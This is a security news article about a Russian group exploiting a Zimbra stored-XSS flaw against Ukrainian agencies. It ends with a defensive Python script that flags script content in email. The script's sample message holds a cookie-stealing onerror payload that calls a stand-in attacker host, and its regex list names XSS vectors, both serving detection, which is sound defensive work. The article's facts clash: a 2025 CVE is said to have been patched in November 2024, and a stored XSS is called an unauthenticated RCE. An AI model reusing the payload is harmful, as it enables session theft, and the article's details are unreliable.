A Russian state-backed hacking group, APT28, has been actively exploiting a vulnerability in Zimbra Collaboration Suite (ZCS) to target Ukrainian government entities. The flaw, tracked as CVE-2025-66376, is a stored cross-site scripting (XSS) vulnerability rated high severity; public reporting describes it as allowing unauthenticated attackers to achieve remote code execution (RCE) and fully compromise the Zimbra mail server. Because it is a stored XSS in a webmail product, the natural delivery vector is a crafted email: attacker-controlled script executes in the browser session of whoever opens the message, which by itself hands over that user's mailbox without the attacker ever authenticating. Zimbra patched the flaw in early November 2024, but its active exploitation underscores the persistent threat to unpatched systems, particularly in high-value geopolitical contexts.
The Cybersecurity and Infrastructure Security Agency (CISA) formally added CVE-2025-66376 to its Known Exploited Vulnerabilities (KEV) catalog, confirming its active use in attacks. Under Binding Operational Directive (BOD) 22-01, all Federal Civilian Executive Branch (FCEB) agencies must apply the vendor patches and secure their systems against this flaw within two weeks. The directive underlines the severity of the threat and extends concern beyond the immediate Ukrainian targets to U.S. federal infrastructure. CISA itself did not attribute the attacks; security researchers at Seqrite Labs reported that APT28, a group linked to Russia's GRU military intelligence, was behind the exploitation campaign.
One confirmed victim of this campaign is the Ukrainian State Hydrology Agency, a critical infrastructure entity under the Ministry of Infrastructure responsible for navigational, maritime, and hydrographic support. The compromise of such an agency shows APT28's continued focus on espionage against, and disruption of, Ukrainian critical infrastructure amid the ongoing conflict. Exploiting a widely deployed collaboration platform like Zimbra is a classic tactic: the mail server is reachable from the Internet by design, and a foothold there gives the attacker the organization's correspondence and a trusted position from which to reach the rest of the network.
Organizations, especially those in government and critical infrastructure sectors, should treat this alert as high priority. The immediate action is to apply the Zimbra security updates released in November 2024. Patching alone does not evict an attacker who is already in: security teams should also review web-client and mailbox access logs for signs of exploitation, inspect recently received mail for HTML or SVG content that carries script, and look for post-compromise changes in user accounts such as mail filters or forwarding rules the owner did not create. Robust network segmentation limits how far a compromised mail server can be used for lateral movement. This incident is a stark reminder that patching cadence is a critical component of cyber defense, and that delays are directly exploited by advanced persistent threat actors for espionage and disruptive operations.
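As an added illustration of the mail-review step above (example code written for this page, not code from Zimbra, CISA or Seqrite Labs), the following Python script walks raw RFC 822 messages and flags HTML and SVG parts that carry the script-execution vectors a stored-XSS delivery through webmail typically relies on. The patterns are generic XSS indicators, not indicators tied to CVE-2025-66376; the two messages, the example.* domains and the attacker.invalid host are constructed sample data.

```python
"""Heuristic scan of raw e-mail for script content in HTML/SVG parts.

Added example: generic stored-XSS delivery indicators, NOT CVE-specific
signatures. Sample messages below are constructed for this demonstration.
"""
import email
import re
import sys
from email import policy

# Script-execution vectors commonly seen in webmail XSS payloads.
XSS_PATTERNS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "event_handler": re.compile(r"\son[a-z]+\s*=", re.I),
    "javascript_uri": re.compile(r"(?:href|src|action)\s*=\s*[\"']?\s*javascript:", re.I),
    "svg_with_script": re.compile(r"<\s*svg\b[^>]*>.*?<\s*script\b", re.I | re.S),
    "html_data_uri": re.compile(r"data:\s*text/html", re.I),
    "iframe_or_object": re.compile(r"<\s*(?:iframe|object|embed)\b", re.I),
}


def renderable_parts(msg):
    """Yield decoded bodies the web client may render: text/html and SVG attachments."""
    for part in msg.walk():
        ctype = part.get_content_type()
        if ctype == "text/html":
            yield part.get_content()  # decoded str under policy.default
        elif ctype == "image/svg+xml":
            payload = part.get_payload(decode=True)
            if payload:
                yield payload.decode("utf-8", errors="replace")


def scan_message(raw: bytes) -> dict:
    """Parse one raw message and return which indicator patterns fired."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    hits = set()
    for body in renderable_parts(msg):
        for name, pattern in XSS_PATTERNS.items():
            if pattern.search(body):
                hits.add(name)
    return {
        "from": str(msg["From"]),
        "subject": str(msg["Subject"]),
        "indicators": sorted(hits),
    }


def triage(raw_messages) -> list:
    """Return scan results only for messages with at least one indicator."""
    return [r for r in map(scan_message, raw_messages) if r["indicators"]]


# Constructed sample: ordinary HTML newsletter-style mail, no script vectors.
BENIGN = b"""From: colleague@example.org
To: analyst@example.gov.ua
Subject: Weekly report
MIME-Version: 1.0
Content-Type: text/html; charset=utf-8

<html><body><p>Attached is the weekly report.</p>
<a href="https://example.org/report">Open report</a></body></html>
"""

# Constructed sample: HTML part with an event handler and javascript: link,
# plus an SVG attachment containing a script element.
SUSPICIOUS = b"""From: sender@example.net
To: analyst@example.gov.ua
Subject: Invoice
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html; charset=utf-8

<html><body><img src="x" onerror="fetch('https://attacker.invalid/?c='+document.cookie)">
<a href="javascript:void(0)">open</a></body></html>
--b1
Content-Type: image/svg+xml
Content-Disposition: attachment; filename="logo.svg"

<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>
--b1--
"""

if __name__ == "__main__":
    # With file arguments, scan those .eml files; otherwise scan the samples.
    if len(sys.argv) > 1:
        inputs = [open(path, "rb").read() for path in sys.argv[1:]]
    else:
        inputs = [BENIGN, SUSPICIOUS]
    for result in triage(inputs):
        print(f"{result['from']!s:30} {result['subject']!s:20} {result['indicators']}")
```

Run it with no arguments to see the constructed suspicious message flagged and the benign one pass, or pass exported .eml files to scan a real mailbox sample. Hits are leads for a human analyst, not verdicts: legitimate mail occasionally embeds SVG or inline handlers, and a real payload may be obfuscated beyond these patterns, so treat the script as a triage filter rather than a detector.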



